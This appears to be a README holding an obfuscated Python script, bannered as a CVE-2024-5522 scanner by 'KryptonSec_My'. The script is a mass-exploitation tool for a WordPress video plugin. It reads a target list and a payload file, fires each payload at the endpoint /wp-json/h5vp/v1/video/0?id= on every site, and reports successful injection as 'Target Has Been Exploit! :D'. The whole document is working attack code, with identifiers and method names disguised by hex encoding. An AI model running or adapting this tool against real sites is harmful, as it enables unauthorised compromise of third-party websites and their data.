README.md
Rendering markdown...
lllllllllllllll, llllllllllllllI, lllllllllllllIl, lllllllllllllII, llllllllllllIll, llllllllllllIlI = open, print, __name__, input, getattr, bytes
from os.path import expanduser as llIIIIllllIIIl
from requests import get as IIIIlIlIlllIII
from requests.exceptions import RequestException as IlllIIIlllIlII
lllIlIlIlIlIIIlIIl = 'payload.txt'
from colorama import Fore as IlIllIIIIIIlIl
def IIlllIIlllllIIIlII():
IllIllIIllllllIIII = '\n ______ ______ ___ ___ ___ ____ ____ ____ ___ ___ \n / ___| | / / ______|_ / _ \\|_ / / /____/ __// __/|_ ||_ |\n / /__ | |/ / _//___/ __/ // / __/_ _/___/__ \\/__ \\/ __// __/ \n \\___/ |___/___/ /____\\___/____//_/ /____/____/____/____/ \n CVE-2024-5522 scanner\n made by KryptonSec_My\n '
llllllllllllllI(IllIllIIllllllIIII)
def llIlIlllIIIlIIllll(lIlllllIIllIlIllIl):
IllIllIIllllllIIII = llIIIIllllIIIl(lIlllllIIllIlIllIl)
with lllllllllllllll(IllIllIIllllllIIII, 'r') as lllIIlIlllIlIllIll:
return [llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('7374726970').decode())() for IllIllIIllllllIIII in llllllllllllIll(lllIIlIlllIlIllIll, llllllllllllIll(llllllllllllIlI, 'fromhex')('726561646c696e6573').decode())()]
def llIllllIlIIllIIlIl(lIlllllIIllIlIllIl):
with lllllllllllllll(lllIlIlIlIlIIIlIIl, 'r') as IllIllIIllllllIIII:
return [llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('7374726970').decode())() for IllIllIIllllllIIII in llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('726561646c696e6573').decode())()]
def IlIllIlIlIIIIlIllI(llllllIIIlllIIIIIl, IIIIllIlIlIIIIIlII, lIIIlllIllIIllIIlI):
IllIllIIllllllIIII = llllllIIIlllIIIIIl
if not llllllllllllIll(IllIllIIllllllIIII, llllllllllllIll(llllllllllllIlI, 'fromhex')('73746172747377697468').decode())('http'):
IllIllIIllllllIIII = 'https://' + IllIllIIllllllIIII
lllIIlIlllIlIllIll = f'{IllIllIIllllllIIII}/wp-json/h5vp/v1/video/0?id={IIIIllIlIlIIIIIlII}'
try:
lIIIllllIllllllllI = IIIIlIlIlllIII(lllIIlIlllIlIllIll, timeout=10)
if 'Injected By KryptonSec_My' in lIIIllllIllllllllI.text:
llllllllllllllI(IlIllIIIIIIlIl.GREEN + f'[+] Target Has Been Exploit! :D {IllIllIIllllllIIII}' + IlIllIIIIIIlIl.WHITE)
llllllllllllIll(lIIIlllIllIIllIIlI, llllllllllllIll(llllllllllllIlI, 'fromhex')('617070656e64').decode())(lllIIlIlllIlIllIll)
else:
llllllllllllllI(IlIllIIIIIIlIl.RED + f'[-] {IllIllIIllllllIIII} seems not vulnerable :(' + IlIllIIIIIIlIl.WHITE)
except IlllIIIlllIlII as IIlIIllllllllIlIll:
llllllllllllllI(IlIllIIIIIIlIl.RED + f'[!] Error connecting to {IllIllIIllllllIIII}: {IIlIIllllllllIlIll}' + IlIllIIIIIIlIl.WHITE)
def lIIllIIIIlllllIlII(llIIlllllllIllllIl, lIlIIIIIIllIIIlIlI):
lIIIllllIllllllllI = llIlIlllIIIlIIllll(llIIlllllllIllllIl)
IIlIIllllllllIlIll = llIllllIlIIllIIlIl(lIlIIIIIIllIIIlIlI)
IllIllIIllllllIIII = []
for lllIIlIlllIlIllIll in lIIIllllIllllllllI:
llllllllllllllI(IlIllIIIIIIlIl.CYAN + f'\n[Scanning {lllIIlIlllIlIllIll}]' + IlIllIIIIIIlIl.WHITE)
for IIlIlIlIIIIlIIlllI in IIlIIllllllllIlIll:
IlIllIlIlIIIIlIllI(lllIIlIlllIlIllIll, IIlIlIlIIIIlIIlllI, IllIllIIllllllIIII)
if IllIllIIllllllIIII:
llllllllllllllI(IlIllIIIIIIlIl.BLUE + '\n[Exploited URLs]' + IlIllIIIIIIlIl.WHITE)
for lllIIIlIIlIIlIIIII in IllIllIIllllllIIII:
llllllllllllllI(lllIIIlIIlIIlIIIII + IlIllIIIIIIlIl.CYAN + '\n[+]' + IlIllIIIIIIlIl.WHITE)
else:
llllllllllllllI(IlIllIIIIIIlIl.RED + '\nNo vulnerabilities found.' + IlIllIIIIIIlIl.WHITE)
if lllllllllllllIl == '__main__':
IIlllIIlllllIIIlII()
llIIlllllllIllllIl = lllllllllllllII('Enter the path to the target list: ')
lIIllIIIIlllllIlII(llIIlllllllIllllIl, lllIlIlIlIlIIIlIIl)